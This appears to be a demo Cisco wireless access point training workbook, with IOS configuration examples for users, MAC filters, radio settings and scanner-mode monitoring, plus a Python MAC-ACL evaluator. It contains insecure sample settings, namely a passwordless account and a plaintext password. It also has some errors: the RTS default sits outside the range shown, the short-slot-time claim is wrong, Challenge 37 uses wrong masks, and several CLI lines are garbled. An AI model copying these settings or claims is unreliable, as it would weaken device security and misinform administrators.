Outline
This challenge involves the configuration of the security of the wireless access point.
Objectives
The objectives of this challenge are to:

- Define usernames and passwords.
- Define privilege levels.
- Restrict access of users to a single host.

Example
> enable
# config t
(config)# username fred ?
  access-class         Restrict access by access-class
  autocommand          Automatically issue a command after the user logs in
  callback-dialstring  Callback dialstring
  callback-line        Associate a specific line with this callback
  callback-rotary      Associate a rotary group with this callback
  dnis                 Do not require password when obtained via DNIS
  nocallback-verify    Do not require authentication after callback
  noescape             Prevent the user from using an escape character
  nohangup             Do not disconnect after an automatic command
  nopassword           No password is required for the user to log in
  password             Specify the password for the user
  privilege            Set user privilege level
  secret               Specify the secret for the user
  user-maxlinks        Limit the user's number of inbound links
  view                 Set view name
  <cr>
(config)# username fred password bert
(config)# username test nopassword
(config)# username fred privilege 15
(config)# username test privilege 1
(config)# username test user-maxlinks 2
(config)# access-list 9 permit host 192.168.0.1
(config)# user fred access-class ?
  <1-199>      Access-class number
  <1300-2699>  Expanded Access-class number
(config)# username fred access-class 9

Explanation
The privilege levels go from level 0 to level 15, for example:

- Level 0. This only includes five commands: disable, enable, exit, help and logout.
- Level 1. This is the non-privileged mode with a prompt of wap>.
- Level 15. This is the highest level of privilege, and has a prompt of wap#.

Typical level 1 commands are:
  access-enable    Create a temporary Access-List entry
  clear            Reset functions
  connect          Open a terminal connection
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  name-connection  Name an existing network connection
  ping             Send echo messages
  rcommand         Run command on remote switch
  resume           Resume an active network connection
  show             Show running system information
  systat           Display information about terminal lines
  telnet           Open a telnet connection
  terminal         Set terminal line parameters
  traceroute       Trace route to destination
  tunnel           Open a tunnel connection
  where            List active connections

Thus:
(config)# username fred privilege 15
(config)# username test privilege 1

sets the maximum privilege level for fred at 15, while test will only be able to enter the
non-privileged mode. Also:
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

restricts the access for fred to a single host (192.168.0.1), so that the user will not be
able to log in from any other host. The following:
(config)# username test user-maxlinks 2

restricts the number of connections for test to two.

Cisco Wireless Challenge 34

Outline
This challenge involves the configuration of the banner messages.
Objectives
The objectives of this challenge are to:

- Set up the message-of-the-day (MOTD) banner.
- Set up the login banner.
- Set up the EXEC banner.

Example
> enable
# config t
(config)# hostname amsterdam
amsterdam (config)# banner motd my device
amsterdam (config)# banner login how are you
amsterdam (config)# banner exec main device
amsterdam (config)# ip http server

Cisco Wireless Challenge 35

Outline
This challenge involves the configuration of Simple Network Time Protocol (SNTP).
Objectives
The objectives of this challenge are to:

- Set up SNTP to receive time updates from a specific server.
- Set up the device to receive SNTP broadcasts.
- Set the system clock (this would not be required if an SNTP server is used, obviously).

Example
> enable
# config t
(config)# hostname amsterdam
amsterdam (config)# sntp ?
  broadcast  Configure SNTP broadcast services
  logging    Enable SNTP message logging
  server     Configure SNTP server
amsterdam (config)# snt s ?
  Hostname or A.B.C.D  Name or IP address of server
amsterdam (config)# sntp server 192.168.1.100 ?
  version  Configure NTP version
  <cr>
amsterdam (config)# sntp server 192.168.1.100
amsterdam (config)# sntp broadcast ?
  client  Enable SNTP broadcast client mode
amsterdam (config)# sntp broadcast client
amsterdam (config)# exit
amsterdam # clock set 05:44
amsterdam # show sntp
SNTP server      Stratum  Version  Last Receive
192.168.1.100    16       1        never
Broadcast client mode is enabled.

Cisco Wireless Challenge 36

Outline
This challenge involves the configuration of filtering incoming MAC addresses for D0.
Objectives
The objectives of this challenge are to:

- Set up MAC filters.
- Implement MAC filters on the incoming side of D0.

Example
In a 700-series MAC access list the second H.H.H value is a mask whose one bits are
ignored when matching, so 0000.0000.0000 matches one exact address and ffff.ffff.ffff
matches any address:
> enable
# config t
(config)# access-list ?
  <1-99>            IP standard access list
  <100-199>         IP extended access list
  <1100-1199>       Extended 48-bit MAC address access list
  <1300-1999>       IP standard access list (expanded range)
  <200-299>         Protocol type-code access list
  <2000-2699>       IP extended access list (expanded range)
  <700-799>         48-bit MAC address access list
  dynamic-extended  Extend the dynamic ACL absolute timer
(config)# access-list 701 ?
  deny    Specify packets to reject
  permit  Specify packets to forward
(config)# access-list 701 deny ?
  H.H.H  48-bit hardware address
(config)# access-list 701 deny 1111.2222.3333 ?
  H.H.H  48-bit hardware address mask
  <cr>
(config)# access-list 701 deny 1111.2222.3333 0000.0000.0000
(config)# access-list 701 deny 1112.2222.3333 0000.0000.0000
(config)# access-list 701 deny 1113.2222.3333 0000.0000.0000
(config)# access-list 701 permit 0000.0000.0000 ffff.ffff.ffff
(config)# int d0
(config-if)# l2-filter bridge-group-acl
(config-if)# bridge-group ?
  <1-255>  Assign an interface to a Bridge Group.
(config-if)# bridge-group 1
(config-if)# bridge-group 1 ?
  <cr>
  circuit-group              Associate serial interface with a circuit group
  input-address-list         Filter packets by source address
  input-lat-service-deny     Deny input LAT service advertisements matching a group list
  input-lat-service-permit   Permit input LAT service advertisements matching a group list
  input-lsap-list            Filter incoming IEEE 802.3 encapsulated packets
  input-type-list            Filter incoming Ethernet packets by type code
  lat-compression            Enable LAT compression over serial or ATM interfaces
  output-address-list        Filter packets by destination address
  output-lat-service-deny    Deny output LAT service advertisements matching a group list
  output-lat-service-permit  Permit output LAT service advertisements matching a group list
  output-lsap-list           Filter outgoing IEEE 802.3 encapsulated packets
  output-type-list           Filter outgoing Ethernet packets by type code
  port-protected             There will be no traffic between this interface and other
                             protected port interface in this bridge group
  subscriber-loop-control    Configure subscriber loop control
  block-unknown-source       block traffic which come from unknown source MAC address
  input-pattern-list         Filter input with a pattern list
  output-pattern-list        Filter output with a pattern list
  path-cost                  Set interface path cost
  priority                   Set interface priority
  source-learning            learn source MAC address
  spanning-disabled          Disable spanning tree on a bridge group
  unicast-flooding           flood packets with unknown unicast destination MAC addresses
(config-if)# bridge-group 1 input-address-list 701

Cisco Wireless Challenge 37

Outline
This challenge involves the configuration of filtering outgoing MAC addresses for D0.
Objectives
The objectives of this challenge are to:

Setup MAC filters.
Implement MAC filters on the outgoing port of D0.

Example
> enable
# config t
(config) # access-list 701 deny 1111.2222.3333 ffff.ffff.ffff
(config) # access-list 701 deny 1112.2222.3333 ffff.ffff.ffff
(config) # access-list 701 deny 1113.2222.3333 ffff.ffff.ffff
(config) # access-list 701 permit 0.0.0 ffff.ffff.ffff
(config) # int d0
(config-if)# l2-filter ?
  block-arp         avoid arp attack
  bridge-group-acl  Use bridge-group ACLs
(config-if)# l2-filter bridge-group-acl ?
  <cr>
(config-if) # l2-filter bridge-group-acl
(config-if)# bridge- ANY ?
  <cr>
  circuit-group              Associate serial interface with a circuit group
  input-address-list         Filter packets by source address
  input-lat-service-deny     Deny input LAT service advertisements matching a group list
  input-lat-service-permit   Permit input LAT service advertisements matching a group list
  input-lsap-list            Filter incoming IEEE 802.3 encapsulated packets
  input-type-list            Filter incoming Ethernet packets by type code
  lat-compression            Enable LAT compression over serial or ATM interfaces
  output-address-list        Filter packets by destination address
  output-lat-service-deny    Deny output LAT service advertisements matching a group list
  output-lat-service-permit  Permit output LAT service advertisements matching a group list
  output-lsap-list           Filter outgoing IEEE 802.3 encapsulated packets
  output-type-list           Filter outgoing Ethernet packets by type code
  port-protected             There will be no traffic between this interface and other
                             protected port interface in this bridge group
  subscriber-loop-control    Configure subscriber loop control
  block-unknown-source       block traffic which come from unknown source MAC address
  input-pattern-list         Filter input with a pattern list
  output-pattern-list        Filter output with a pattern list
  path-cost                  Set interface path cost
  priority                   Set interface priority
  source-learning            learn source MAC address
  spanning-disabled          Disable spanning tree on a bridge group
  unicast-flooding           flood packets with unknown unicast destination MAC addresses
(config-if) # bridge-group 1
(config-if)# bridge- ANY output-a ?
  <700-799>  Ethernet address access list
(config-if) # bridge-group 1 output-address-list 701

Cisco Wireless Challenge 38


Outline
This challenge involves the configuration of filtering outgoing MAC addresses for D0 for a
source and destination MAC address.
Objectives
The objectives of this challenge are to:

Setup an extended MAC address filter.
Implement MAC filter on the outgoing port of D0.

Example
> enable
# config t
(config) # access-list 1102 deny 1111.2222.3333 0.0.0 1112.2222.3333 0.0.0
(config) # access-list 1102 permit 0.0.0 ffff.ffff.ffff 0.0.0 ffff.ffff.ffff
(config) # int d0
(config-if) # l2-filter bridge-group-acl
(config-if) # bridge-group 1
(config-if) # bridge-group 1 output-pattern-list ?
<1100-1199> Pattern access list number
(config-if) # bridge-group 1 output-pattern-list 1102

Cisco Wireless Challenge 39


Outline
This challenge involves the configuration of filtering incoming MAC addresses for D0 for a
source and destination MAC address.
Objectives
The objectives of this challenge are to:

Setup an extended MAC address filter.
Implement MAC filter on the incoming port of D0.

Example
> enable
# config t
(config) # access-list 1102 deny 1111.2222.3333 0.0.0 1112.2222.3333 0.0.0
(config) # access-list 1102 permit 0.0.0 ffff.ffff.ffff 0.0.0 ffff.ffff.ffff
(config) # int d0
(config-if) # l2-filter bridge-group-acl
(config-if) # bridge-group 1
(config-if) # bridge-group 1 input-pattern-list ?
<1100-1199> Pattern access list number
(config-if) # bridge-group 1 input-pattern-list 1102

Cisco Wireless Challenge 40


Outline
This challenge involves the configuration of filtering incoming MAC addresses for D0.
Objectives
The objectives of this challenge are to:

Setup MAC filters.
Implement MAC filters on the incoming port of D0.

Example
> enable
# config t
(config) # access-list 701 permit 1111.2222.3333 ffff.ffff.ffff
(config) # access-list 701 permit 1112.2222.3333 ffff.ffff.ffff
(config) # access-list 701 permit 1113.2222.3333 ffff.ffff.ffff
(config) # access-list 701 deny 0.0.0 ffff.ffff.ffff
(config) # int d0
(config-if) # l2-filter bridge-group-acl
(config-if) # bridge-group 1
(config-if) # bridge-group 1 input-address-list 701
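As an added example (not part of the NetworkSims challenges), the following Python models the 700-series address lists and 1100-series pattern lists used in Challenges 36 to 40, with first-match evaluation and the implicit deny at the end of every list. It applies Cisco's documented wildcard-mask rule for these list types (a 0 bit in the mask must match, a 1 bit is ignored), so an exact-match entry uses the 0000.0000.0000 mask and a ffff.ffff.ffff mask matches every address; the access-list lines and MAC addresses in it are constructed sample data.

```python
"""Evaluate Cisco-style 48-bit MAC access lists: 700-799 address lists
(applied with bridge-group input/output-address-list) and 1100-1199
extended pattern lists (input/output-pattern-list).

Mask rule (Cisco wildcard semantics for these lists): a 0 bit means the
address bit must match, a 1 bit means "don't care".  All access-list
lines and MAC addresses below are constructed sample data.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# IOS accepts abbreviated groups such as 0.0.0 for 0000.0000.0000
_MAC_RE = re.compile(r"^[0-9a-fA-F]{1,4}\.[0-9a-fA-F]{1,4}\.[0-9a-fA-F]{1,4}$")


def mac_to_int(mac: str) -> int:
    """Convert an IOS dotted-hex MAC (H.H.H) to a 48-bit integer."""
    if not _MAC_RE.match(mac):
        raise ValueError(f"bad MAC address: {mac!r}")
    return int("".join(group.zfill(4) for group in mac.split(".")), 16)


@dataclass
class Entry:
    permit: bool
    addr: int
    mask: int
    dst: Optional[int] = None        # only set for extended (1100-1199) lists
    dst_mask: Optional[int] = None


def _matches(value: int, addr: int, mask: int) -> bool:
    """True when every bit that is 0 in the wildcard mask agrees."""
    return (value & ~mask) == (addr & ~mask)


def parse_acl(lines: List[str]) -> Tuple[int, List[Entry]]:
    """Parse 'access-list N permit|deny ...' lines; a (config)# prompt may precede them."""
    number, entries = None, []
    for line in lines:
        parts = line.split("#", 1)[-1].split()    # drop any prompt text
        if len(parts) < 5 or parts[0] != "access-list":
            continue
        num, permit = int(parts[1]), parts[2] == "permit"
        number = number or num
        entry = Entry(permit, mac_to_int(parts[3]), mac_to_int(parts[4]))
        if 1100 <= num <= 1199:                     # source mask dest mask
            if len(parts) < 7:
                raise ValueError(f"extended entry needs a destination: {line!r}")
            entry.dst, entry.dst_mask = mac_to_int(parts[5]), mac_to_int(parts[6])
        elif not 700 <= num <= 799:
            raise ValueError(f"{num} is not a MAC access list number")
        entries.append(entry)
    if number is None:
        raise ValueError("no access-list lines found")
    return number, entries


def address_list_permits(entries: List[Entry], addr: str) -> bool:
    """700-799 list: first matching entry wins, implicit deny at the end.
    input-address-list checks the frame's source MAC and
    output-address-list its destination MAC, so pass the right one."""
    value = mac_to_int(addr)
    for e in entries:
        if _matches(value, e.addr, e.mask):
            return e.permit
    return False


def pattern_list_permits(entries: List[Entry], src: str, dst: str) -> bool:
    """1100-1199 list: the source and destination must both match an entry."""
    s, d = mac_to_int(src), mac_to_int(dst)
    for e in entries:
        if e.dst is None:
            raise ValueError("pattern list entry without a destination")
        if _matches(s, e.addr, e.mask) and _matches(d, e.dst, e.dst_mask):
            return e.permit
    return False


# Constructed sample lists.  ALLOW_LIST puts an all-zero mask on the
# specific address (exact match) and an all-ones mask on the catch-all.
# ANY_MASK_LIST puts the all-ones mask on the specific address, which
# under the wildcard rule matches every address, so its first line
# already decides the result for any frame.
ALLOW_LIST = [
    "access-list 701 permit 1111.2222.3333 0000.0000.0000",
    "access-list 701 deny 0.0.0 ffff.ffff.ffff",
]
ANY_MASK_LIST = [
    "(config) # access-list 701 deny 1111.2222.3333 ffff.ffff.ffff",
    "(config) # access-list 701 permit 0.0.0 ffff.ffff.ffff",
]
PAIR_LIST = [
    "access-list 1102 deny 1111.2222.3333 0.0.0 1112.2222.3333 0.0.0",
    "access-list 1102 permit 0.0.0 ffff.ffff.ffff 0.0.0 ffff.ffff.ffff",
]
```

Running address_list_permits over the two 701 lists with a MAC other than 1111.2222.3333 shows the difference: ALLOW_LIST denies it at the catch-all, ANY_MASK_LIST denies it at the first line.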

Cisco Wireless Challenge 41


Outline
This challenge involves the configuration of ARP caching for connected wireless nodes, and
to enable Cisco Aironet extensions.
Objectives
The objectives of this challenge are to:

Setup BVI port.
Enable ARP caching for connected wireless nodes.
Enable Cisco Aironet extensions.

Example
> enable
# config t
(config)# int bvi 1
(config-if)# ip address 158.234.223.7 255.192.0.0
(config-if)# exit
(config)# dot11 arp-cache
(config)# int d0
(config-if)# dot11 ?
  extension  Cisco IEEE 802.11 extension
  qos        Dot11 QOS configuration
(config-if)# dot11 ex ?
  aironet  Cisco Aironet extension
  power    Enable Cisco proprietary native power management
(config-if)# dot11 extension aironet

Explanation
The Cisco Aironet extensions are:

Cisco Key Integrity Protocol (CKIP). This uses a permutation method to renew the
WEP key. If TKIP is used, CKIP is not required.
Limiting power level. This allows the Aironet to control the power level of the clients,
once they associate.
Load balancing. This allows the access point to select the best access point in terms of
signal strength, load requirements, and so on.
Message Integrity Check (MIC). This enhances WEP security against a number of attacks.
Repeater mode. This allows the access point to support repeater access points.
World mode. This allows clients to receive carrier information from the wireless device
and adjust their settings automatically.


Cisco Wireless Challenge 42


Outline
This challenge involves the disabling of ARP caching for connected wireless nodes, and to
disable Cisco Aironet extensions.
Objectives
The objectives of this challenge are to:

Setup BVI port.
Disable ARP caching for connected wireless nodes.
Disable Cisco Aironet extensions.

Example
> enable
# config t
(config)# int bvi 1
(config-if)# ip address 158.234.223.7 255.192.0.0
(config-if)# exit
(config)# no dot11 arp-cache
(config)# int d0
(config-if)# no dot11 extension aironet

Explanation
The Cisco Aironet extensions are:

Cisco Key Integrity Protocol (CKIP). This uses a permutation method to renew the
WEP key. If TKIP is used, CKIP is not required.
Limiting power level. This allows the Aironet to control the power level of the clients,
once they associate.
Load balancing. This allows the access point to select the best access point in terms of
signal strength, load requirements, and so on.
Message Integrity Check (MIC). This enhances WEP security against a number of attacks.
Repeater mode. This allows the access point to support repeater access points.
World mode. This allows clients to receive carrier information from the wireless device
and adjust their settings automatically.


Cisco Wireless Challenge 43


Outline
This challenge involves the configuration of the beacon settings for the beacon period and
for the DTIM (delivery traffic indication message).
Objectives
The objectives of this challenge are to:

Define the beacon period.
Define the beacon DTIM.

Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# beacon ?
  dtim-period  dtim period
  period       beacon period
(config-if)# beacon period ?
  <20-4000>  Kusec (or msec)
(config-if)# beacon period 2000
(config-if)# beacon dtim ?
  <1-100>  dtim count
(config-if)# beacon dtim 50

Explanation
The beacon period is defined as the amount of time between access point beacons in
kilomicroseconds (1 Kusec is 1.024 milliseconds). The default is 100 Kusec. If the beacon
period is 1000, the time between beacons is approximately 1 second (1.024 seconds).
The Data Beacon Rate defines how often the DTIM (delivery traffic indication message)
appears in a beacon, where the DTIM tells power-save client devices that a packet is waiting
for them. The default DTIM is 2. If the DTIM is set at 5, and the beacon period is 1000, a
packet with a DTIM will be sent every 5 seconds (approx).

RTS Explained
Outline: This challenge involves an analysis of RTS.
Objectives: The objectives of this challenge are to explain RTS.


Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# rts ?
  retries    RTS max retries
  threshold  RTS threshold
(config-if)# rt re ?
  <1-128>  max retries
(config-if)# rts retries 100
(config-if)# rt th ?
  <0-2347>  threshold in bytes
(config-if)# rts threshold 1000

Explanation
The RTS threshold prevents the Hidden Node problem, where two wireless nodes are within
range of the same access point, but are not within range of each other, as illustrated in
Figure 1. As they do not know that they both exist on the network, they may try to
communicate with the access point at the same time. When they do, their data frames may
collide when arriving simultaneously at the access point, which causes a loss of data frames
from the nodes. The RTS threshold tries to overcome this by enabling the handshaking
signals of Ready To Send (RTS) and Clear To Send (CTS). When a node wishes to
communicate with the access point it sends an RTS signal to the access point. Once the access
point determines that it can communicate, it sends a CTS signal. The node can then send
its data, as illustrated in Figure 2. The RTS threshold determines the data frame size that is
required in order for the node to send an RTS to the WAP. The default value is 4000.
# config t
(config)# int dot11radio0
(config-if)# rts ?
  retries    RTS max retries
  threshold  RTS threshold
(config-if)# rts threshold ?
  <0-2347>  threshold in bytes
(config-if)# rts threshold 2000

... diagrams not shown in Demo version.

RTS retries defines the number of times that an access point will transmit an RTS signal
before it stops sending the data frame. Values range from 1 to 128. For example:
# config t
(config)# int dot11radio0
(config-if)# rts retries ?
  <1-128>  max retries
(config-if)# rts retries 10
(config-if)# end

Fragment-threshold Explained
Outline: This challenge involves an analysis of the fragment-threshold.
Objectives: The objectives of this challenge are to explain fragment-threshold.
Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# fragment-threshold ?
<256-2346>
(config-if)# fragment-threshold 1000

Explanation
A wireless data frame can have up to 2312 data bytes in the data payload. This large amount
could hog the bandwidth too much, and not give an even share to all the nodes on the
network, as illustrated in Figure 1. Research has argued that creating smaller data frames,
often known as cells, is more efficient in using the available bandwidth, and also for
switching data frames. Thus wireless systems provide a fragment threshold, above which
larger data frames are split into smaller parts, as illustrated in Figure 2. An example of the
configuration is:
# config t
(config)# int dot11radio0
(config-if)# fragment-threshold ?
<256-2346>
(config-if)# fragment-threshold 700

... diagrams missed out in demo version

Power Settings Explained

Outline: This challenge involves an analysis of the power settings.
Objectives: The objectives of this challenge are to explain power settings.


Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# po lo cc ?
  <1 - 50>  One of: 1 5 10 20 30 50
  maximum   Set local power to allowed maximum
(config-if)# power local 50
(config-if)# power client ?
  <1 - 50>  One of: 1 5 10 20 30 50
  local     Set client power to Access Point local power
  maximum   Set client power to allowed maximum
(config-if)# power client 10

Explanation
The power of the access point and also of the clients is important as it defines the
coverage of the signal, and must also be within the required safety limits. Thus, the more
radio power that is used to transmit the signal, the wider the scope of the wireless network.
Unfortunately, the further that the signal goes, the more chance that an intruder can pick up
the signal, and, possibly, gain access to its contents, as illustrated in Figure 1. To control this
power, the access point can set its own radio power, and is also able to set the power
transmission of the client adapter. An example of setting the local power and the client
power is shown next:
# config t
(config)# int dot11radio0
(config-if)# power ?
(config-if)# power local ?
  <1-50>   One of: 1 5 20 30 50
  maximum  Set local power to allowed maximum
(config-if)# power local 30
(config-if)# power client ?
  <1-50>   One of: 1 5 20 30 50
  maximum  Set client power to allowed maximum
(config-if)# power client 10

... diagrams missed out in demo version


On the client, especially with portable devices, the power usage of the radio port is
important. Thus there are typically power settings, such as:

CAM (Constant awake mode). Used when power usage is not a problem.
PSP (Power save mode). Power is conserved as much as possible. The card will typically
go to sleep, and will only be awoken by the access point, or if there is activity.
FastPSP (Fast power save mode). This uses both CAM and PSP, and is a compromise
between the two.


Max-associations Explained
Outline: This challenge involves an analysis of the maximum associations.
Objectives: The objectives of this challenge are to explain the maximum associations.
Example (12.3)
> enable
# config t
(config)# dot11 ssid fred
(config-ssid)# max ?
<1-255> association limit
(config-ssid)# max-assoc 9
(config-ssid)# exit
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# ssid fred

Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# ssid fred
(config-if-ssid)# max-assoc ?
<1-255> association limit
(config-if-ssid)# max-assoc 9

Explanation
A particular problem in wireless networks is that the access point may become
overburdened with connected clients. This could be due to an attack, such as DoS (Denial of
Service), or due to poor planning. To set the maximum number of associations, the
max-associations command is used within the SSID setting:
# config t
(config)# int dot11radio0
(config-if)# ssid fred
(config-if-ssid)# max ?
  <1-255>  association limit
(config-if-ssid)# max 100
(config)# exit

and to show the associations for the wireless access point:
# show dot11 ?
# show dot11 association
# show dot11 statistics client-traffic

and for associated access points:
# show dot11 adjacent-ap

Preamble Explained
Outline: This challenge involves an analysis of the preamble.
Objectives: The objectives of this challenge are to explain the preamble.
Explanation
This can either be set to Long (which is the default) or Short. A long preamble allows for
interoperability with 1Mbps and 2Mbps DSSS specifications. The shorter allows for faster
operation (as the preamble is kept to a minimum) and can be used where the transmission
parameters must be maximized and there are no interoperability problems. To set a
short preamble:
# config t
(config)# int dot11radio0
(config-if)# preamble-short
(config-if)# end

... diagrams missed out in demo version

Station-role Explained
Outline: This challenge involves an analysis of the station role.
Objectives: The objectives of this challenge are to explain the station role.
Explanation
A root access point is used to connect a wireless client to a fixed network, whereas a repeater
access point does not connect to a wired LAN, and basically forwards the data packets to
another repeater or to a wireless access point which is connected to a wired network (Figure
1). With a repeater, of course, the Ethernet port will not operate. The repeater access point
typically associates with the access point which has the best connectivity; however, it can
be set up to connect to a specific access point. In the following case, the access point will
associate with the parent with the specified MAC address (1111.2222.3333):
# config t
(config)# dot11 ssid napier
(config-ssid)# infr ?
  optional  turn off infrastructure restrictions
  <cr>
(config-ssid)# infrastructure-ssid
(config-ssid)# exit
(config)# interface d0
(config-if)# ssid napier
(config-if)# station-role repeater
(config-if)# dot11 extension aironet
(config-if)# parent ?
  <1-4>    Parent number
  timeout  Time in seconds to look for parent
(config-if)# parent 1 ?
  H.H.H  Parent MAC addr
(config-if)# parent 1 1111.2222.3333
(config-if)# parent 2 2222.aaaa.bbbb
(config-if)# end

Or
# config t
(config)# interface d0
(config-if)# ssid napier
(config-ssid)# infrastructure-ssid
(config-ssid)# exit
(config-if)# station-role repeater
(config-if)# dot11 extension aironet
(config-if)# parent 1 1111.2222.3333
(config-if)# parent 2 2222.aaaa.bbbb
(config-if)# end

It is possible to define up to four parents, so that if one fails to associate, it can use others.
In most cases the Cisco Aironet extensions must be enabled, as they aid the association
process, but this can cause incompatibility problems with non-Cisco devices.
... diagrams missed out in demo version
The repeater will start with the first parent, and, if it cannot connect, it will then try the next
parent, and so on. Overall, repeaters are fairly good at extending the range of a wireless
network, but reduce the throughput, as bandwidth is wasted in relaying the data from
repeaters. As an approximation the actual throughput will be reduced by at least half.

Short-time Slot Explained

Outline: This challenge involves an analysis of the short-time slot.
Objectives: The objectives of this challenge are to explain the short-time slot.
Explanation
The throughput of a wireless network can be reduced by enabling short slot time. When
enabled it reduces the slot time from 20 microseconds to 9 microseconds. The backoff time is
the time that wireless nodes wait before transmitting, and is a random multiple of the slot
time. Thus reducing the slot time will typically reduce the backoff time. To enable it:
(config)# int d0
(config-if)# short-slot-time

Note that short slot time is only available in IEEE 802.11g. By default it is disabled.

MAC Authentication Explained


Outline: This challenge involves an analysis of the MAC authentication cache.
Objectives: The objectives of this challenge are to explain MAC authentication cache.
Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# exit
(config)# aaa new-model
(config)# dot11 aaa ?
  authentication  Authentication
  csid            Calling and Called station ID format
  dot1x           802.1x
(config)# dot11 aaa authentication ?
  attributes  Configure Dot11 AAA authentication attributes
  mac-authen  Configure Mac Authentication details
(config)# dot11 aaa authentication mac-authen filter-cache

Explanation
MAC authentication cache on the access points is typically used where MAC-authenticated
clients roam around the network. When it is enabled it reduces the time overhead in reauthenticating the nodes with an authentication server. When a node is initially
authenticated, its MAC address is added to the cache.

Wireless IDS Explained


Outline: This challenge involves an analysis of WIDS.
Objectives: The objectives of this challenge are to explain WIDS.


Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# st ?
  non-root          Non-root (bridge)
  repeater          Repeater access point
  root              Root access point or bridge
  scanner           Scanner access point
  workgroup-bridge  Workgroup Bridge
(config-if)# station scanner
(config-if)# monitor ?
  frames  Monitor dot11 frames
(config-if)# monitor frames ?
  endpoint  endpoint station where the captured traffic is
(config-if)# monitor frames endpoint ?
  ip  IP address
(config-if)# monitor frames endpoint ip ?
  address  IP address
(config-if)# monitor frames endpoint ip address ?
  A.B.C.D  Destination IP Address xxx.xxx.xxx.xxx
(config-if)# monitor frames endpoint ip address 10.0.0.1 ?
  port  UDP port number
(config-if)# monitor frames endpoint ip address 10.0.0.1 port ?
  <1024-65535>  Destination UDP port number 1024 to 65535
(config-if)# monitor frames endpoint ip address 10.0.0.1 port 1111
(config-if)# exit
(config)# wlccp ?
  ap                     Enable WLCCP AP
  authentication-server  Authentication Server
  wds                    Enable Wireless Domain Service Manager
  wnm                    Configure Wireless Network Manager
(config)# wlccp ap ?
  username  Specify the AP's WLCCP username
  wds       IP address of WDS
(config)# wlccp au ?
  client          For Clients
  infrastructure  For Infrastructure Nodes
(config)# wlccp wd ?
  aaa         Authentication, Authorization, and Accounting
  interface   Interface to send WDS Adv
  priority    Priority of WDS
  recovery    WDS Graceful Recovery
  statistics  Roaming statistics
(config)# wlccp wn ?
  ip  IP configuration commands

Explanation
The scanner mode is used in WIDS where the access point listens on all of the radio
channels and reports activity. As it is used as a WIDS, it does not accept any associations.
The monitor command can then be used to forward all of the data packets received to a
specific address on a certain port, such as for 10.0.0.1 on UDP port 1111:
(config-if)# monitor frames endpoint ip address 10.0.0.1 port 1111

To show the captured packets:
# sh wl ap rm monitor stat
Dot11Radio0
====================
WLAN Monitoring         : Enabled
Endpoint IP address     : 10.0.0.1
Endpoint port           : 1111
Frame Truncation Length : 128 bytes
Dot11Radio1
====================
WLAN Monitoring         : Disabled

WLAN Monitor Statistics
==========================
Total No. of frames rx by DOT11 driver   : 0
Total No. of Dot11 no buffers            : 0
Total No. of Frames Q Failed             : 0
Current No. of frames in SCAN Q          : 0
Total No. of frames captured             : 0
Total No. of data frames captured        : 0
Total No. of control frames captured     : 0
Total No. of Mgmt frames captured        : 0
Total No. of CRC errored frames captured : 0
Total No. of UDP packets forwarded       : 0
Total No. of UDP packets forward failed  : 0

and to clear the statistics:


# clear wlccp ap rm statistics

Wireless Shutdown Explained


Outline: This challenge involves an analysis of wireless shutdown.


Objectives: The objectives of this challenge are to explain wireless shutdown.


Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# station root fallback shutdown

Explanation
A major problem occurs when the Ethernet/Radio port fails, and in some situations the
radio port of the access point should shut down. The following shuts down the D0 port
when the Ethernet connection fails:
(config-if)# station ?
  non-root          Non-root (bridge)
  repeater          Repeater access point
  root              Root access point or bridge
  scanner           Scanner access point
  workgroup-bridge  Workgroup Bridge
(config-if)# station root ?
  access-point  Access point
  ap-only       Bridge root in access point only mode
  bridge        Bridge root (without wireless client)
  fallback      Root AP action if Ethernet port fails
(config-if)# station root fallback ?
  repeater  Become a repeater
  shutdown  Shutdown the radio
(config-if)# station root fallback shutdown

Web Server Explained


Outline: This challenge involves an analysis of the Web server.
Objectives: The objectives of this challenge are to explain the Web server.
Explanation
By default the Web server is not enabled. To enable it:
# config t
(config)# int bvi1
(config-if)# ip address 10.0.0.1 255.255.255.0
(config-if)# exit
(config)# ip http server

By default the Web page is then accessed by the client with (http://10.0.0.1):


... graphic missed out on version see help file.


Sometimes another port is used, such as 8080 with:
(config)# ip http port 8080

which is accessed with (http://10.0.0.1:8080):


... graphic missed out on version see help file.
The details are then displayed with:
# sh ip http server all
HTTP server status: Enabled
HTTP server port: 8080
HTTP server authentication method: enable
HTTP server access class: 0
HTTP server base path: flash:/c1200-k9w7-mx.123-8.JA/html/level/1;zflash:/c1200-k9w7-mx.123-8.JA/html/level/1;flash:/c1200-k9w7-mx.123-8.JA/html/level/15;zflash:/c1200-k9w7-mx.123-8.JA/html/level/15;flash:/c1200-k9w7-mx.123-8.JA/html;zflash:/c1200-k9w7-mx.123-8.JA/html;flash:
Maximum number of concurrent server connections allowed: 5
Server idle time-out: 120 seconds
Server life time-out: 120 seconds
Maximum number of requests allowed on a connection: 60
HTTP secure server capability: Present
HTTP secure server status: Disabled
HTTP secure server port: 443
HTTP secure server ciphersuite: 3des-ede-cbc-sha des-cbc-sha rc4-128-md5 rc4-128-sha
HTTP secure server client authentication: Disabled
HTTP secure server trustpoint:
HTTP server application session modules:
Session module Name  Handle  Description
Homepage_Server      3       IOS Homepage Server
HTTP IFS Server      1       HTTP based IOS File Server
WEB_EXEC             2       HTTP based IOS EXEC Server
